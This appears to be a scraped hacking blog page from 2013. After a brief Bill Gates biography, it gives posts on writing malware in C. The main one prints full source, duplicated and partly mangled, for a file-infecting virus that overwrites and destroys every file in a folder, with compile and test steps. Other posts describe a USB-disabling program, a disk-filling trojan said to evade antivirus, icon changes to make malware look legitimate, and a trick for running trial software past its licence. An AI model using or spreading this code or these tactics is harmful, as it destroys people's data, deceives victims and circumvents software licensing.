Biography for Bill Gates Bill Gates is one of the most influential people in the world. He is cofounder of one of the most recognized brands in the computer industry with nearly every desk top computer using at least one software program from Microsoft. According to the Forbes magazine, Bill Gates is the richest man in the world and has held the number one position for many years. Gates was born and grew up in Seattle, Washington USA. His father, William H. Gates II was a Seattle attorney and his mother, Mary Maxwell Gates was a school teacher and chairperson of the United Way charity. Gates and his two sisters had a comfortable upbringing, with Gates being able to attend the exclusive secondary "Lakeside School". Bill Gates started studying at Harvard University in 1973 where he spent time with Paul Allen. Gates and Allen worked on a version of the programming language BASIC, that was the basis for the MITS Altair (the first microcomputer available). He did not go on to graduate from Harvard University as he left in his junior year to start what was to become the largest computer software company in the world; Microsoft Corporation. |
Saturday, February 16, 2013
Biography for Bill Gates
How to Create a Computer Virus?
This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
This virus is designed to infect all types of files with any extension.
You can download the source code from the following link:
How it Works?
The algorithm of this virus program is as follows:
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.
How to Compile the Program:
For a step-by-step guide, you can refer my detailed post on how to compile C programs?
How to Test the Virus After the Compilation:
- Create a new empty folder.
- Put some executable files (or any other files) in the folder.
- Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
- Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.
NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.
How to Compile C Programs
How to Compile C Programs
In many of my previous posts especially in the VIRUS CREATIONsection, I have used C as the programming language for writing the programs. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you.
Here is a step-by-step procedure to install Borland C++ compiler 5.5 on your PC and compile the C programs.
How to Install Borland C++ compiler?
Follow the below steps to install Borland C++ compiler 5.5 on your PC:
- Download Borland C++ compiler 5.5 (for Windows platform) from the following link:
- After you download, run the file C++5.51.exe. The default installation path would be:C:\Borland\BCC55
How to configure Borland C++ compiler?
Here is a step-by-step instruction on how to configure the compiler:
- After you install Borland C++ compier, create two new Text Documents.
- Open the first New Text Document.txt file and add the following two lines into it:-I”c:\Borland\Bcc55\include”-L”c:\Borland\Bcc55\lib”Save changes and close the file. Now rename the file from New Text Document.txt tobcc32.cfg.
- Open the second New Text Document (2).txt file and add the following line into it:-L”c:\Borland\Bcc55\lib”Save changes and close the file. Rename the file from New Text Document (2).txt toilink32.cfg.
- Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.
How to Compile the C Source Code (.C files)?
Here is a detailed instruction on how to compile C source codes:
- You need to place the .C (example.c) file to be compiled in the following location:
- Now go to the command prompt (Start->Run->type cmd->Enter)
- Make the following path as the present working directory (use the CD command):
- To compile the file (example.c) use the following command:
- Now if there exists no error in the source code, you’ll get a compiled executable module (example.exe) in the same location (C:\Borland\BCC55\Bin).
- Now you have successfully compiled the source code into an executable file(.exe file).
C:\Borland\BCC55\Bin
C:\Borland\BCC55\Bin
bcc32 example.c
NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).
How to Change the ICON of an EXECUTABLE file
How to Change
the ICON of an EXECUTABLE file
Some times it becomes necessary to change the
icon of an executable (.exe) file so that the file get’s a new appearance.
Many of the tools such as TuneUP Winstyler does this job by adjusting the Windows
to display a custom icon to the user. But, in reality if the file is carried to
a different computer, then it shows it’s original icon itself.
This means that in order to permanently change the icon, it is
necessary to modify the executable file and embed the icon inside the file
itself. When this is done the executable file’s icon is changed permanently, so
that even if you take file to a different computer it show’s a new icon.
For this purpose I have found a nice tool which
will modidify the executable file and embed the icon of your choice into the
file itself. ie:
The tool changes the icon of the executable file permanently.
I will give you a step-by-step instruction on how to use this tool
to change the icon:
1. Go to www.shelllabs.com and download the trial version of IconChanger and install it (Works on XP, Vista and Win 7).
2. Run the IconChanger
program from Start -> All Programs and you should see an interface as shown below:
3.
Now you will see a window stating that “Choose an object whose
icon you want to change”. Click on the “OK” button.
4. Now select the executable file for which you wish to change the icon.
5.
Icon changer will automatically search for all the icons on your
“C:\ drive” so that you can select any one of those. If your desired icon is
not shown in the window, you may paste the path of your icon file in the field
which says “Search icons in” so that your desired icon gets displayed.
6. Select the ICON of your
choice and click on Set button.
7.
Now a popup window will appear and ask you to select from either
of these two options.
·
Change embeded icon.
·
Adjust Windows to display custom icon.
8.
Select the first option (Change embedded icon). You are done. The
icon get’s changed.
I hope you like this post. Pass your comments in case if you have
any queries or clarifications.
A Virus Program to Disable USB Ports
A Virus
Program to Disable USB Ports
In this post, I will show how to create a simple virus that
disables/blocks the USB ports on the computer (PC). As usual, I am using
my favorite C programming language to create this virus. Anyone with a basic
knowledge of C language should be able to understand the working of this
virus program.
Once this virus is executed it will immediately disable
all the USB ports on the computer. As a result you’ll will not be able to
use your pen drive or any other USB peripheral devices on the
computer. The source code for this virus is available for download. You can
test this virus on your own computer without any worries since I have also
given a program to re-enable all the USB ports.
1.
Download the source code of the virus program on to your computer
from the following link:
The download contains the following 2 files:
·
block_usb.c (source code)
·
unblock_usb.c (source code)
2. You need to compile them
before you can run it. A step-by-step procedure to compile C programs is given
in my post - How to Compile CPrograms.
3. Upon compilation of
block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all
the USB ports on the computer upon execution (double click).
3. To test this virus, just
run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see
that your pen drive will never get detected. To re-enable the USB ports just
run theunblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the
pen drive and it should get detected.
4. You can also change the icon of
this file to make it look like a legitimate program. For more details on this
refer my post – How to Change the ICONof an EXE file (This step is also
optional).
How it Works?
The idea behind the working of this virus is pretty
straightforward. It works by gaining access to the Windows registry and modifying
it’s settings to disable the USB device support on the computer.
On the other hand, the other program will re-set the registry
settings back to the normal so that the support for USB devices is re-enabled.
I hope you like this post. Please pass your comments
How to Make a Trojan Horse
How to Make a
Trojan Horse
Most of
you may be curious to know about how to make a Trojan or
Virus on your own. Well, here is an answer to your curiosity. In this, post
I’ll show you how to make a simple
trojan on your own using C programming language.
This trojan when executed will eat up the hard disk space on the
root drive (The drive on which the Windows is installed, usually C: Drive) of
the computer on which it is run. Also, this trojan works pretty quickly and is
capable of eating up approximately 1 GB of hard disk space for every minute it
is run.
So, I’ll call this as Space Eater Trojan. Since this program is
written using a high level programming language, it is often undetected by
antivirus programs. The source code for this program is available for
download at the end of this post. Let’s see how this trojan works:
Before I move on to explain the
working of this program, you need to know what exactly is a Trojan horse and how it works. Unlike what
many of us think, a trojan horse is not a virus. In simple words, it is
just a program that appears to do a favorable task but in reality
performs undisclosed malicious functions that allow the attacker to gain
unauthorized access to the host machine or cause a damage to the computer.
Now lets move to the working of our Trojan:
How to Completely Erase a Hard Disk Drive
How to
Completely Erase a Hard Disk Drive
A new
year has begun and perhaps you have decided to perform a system
upgrade or get rid of your old computer system and purchase a new one.
But, before you sell or donate your old computer, it is very much
necessary to completely erase your hard disk drive.
Yes, every one of us are aware of
this fact and so, we delete the contents of the hard disk either by using
the DELETE key on our keyboard or by Formatting the hard disk.
Deleting and Formatting – Just Not Secure Enough
How to Recover Deleted Files from Windows and Mac
How to Recover
Deleted Files from Windows and Mac
Have you accidentally deleted your files
from the hard disk? Do you desperately want to recover them back?
Well, you need not panic!
It is possible to recover the deleted files or data back from the
hard disk (even after you have Shift+Deleted) provided you act as
soon as you realize that the files are deleted and use the best deleted files
recovery software.
In this post you will find a detailed information on how to
recover the deleted files back from your Windows PC or Mac.
How Does the File Recovery Process Works?
Hack Software and Run the Trial Program Forever
Hack Software and Run the Trial Program Forever
In this post, I will show you how to hack a Software and run the trial program forever. Most of us are familiar with many software programs that run only for a specified period of time in the trial mode. Once the trial period is expired, these programs stop functioning and demand for a purchase.
However, there is a way to run the software programs so that they function beyond the trial period. Isn’t this interesting?
Well, before I tell you how to hack the software and make it run in the trial mode forever, we will have to first understand how the licensing scheme of these programs work. I’ll try to explain this in brief.
When the software programs are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After the installation, every time you run the program, it compares the current system date and time with the installed date and time. With this, it can make out whether the trial period is expired or not.
So, with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small tool known as RunAsDate.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.
RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003, Vista and 7.
You can download RunAsDate from the following link:
NOTE: FOLLOW THESE TIPS CAREFULLY:
You will have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever:
- Note down the date and time, when you install the software for the first time.
- Once the trial period expires, you must always run the software using RunAsDate.
- After the trial period is expired, do not run the software(program) directly. If you run the softwaredirectly even once, this hack may no longer work.
- It is better and safe to inject the date of the last day in the trial period.
For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate. I hope this helps! Please express your experience and opinions through comments.
Subscribe to:
Posts (Atom)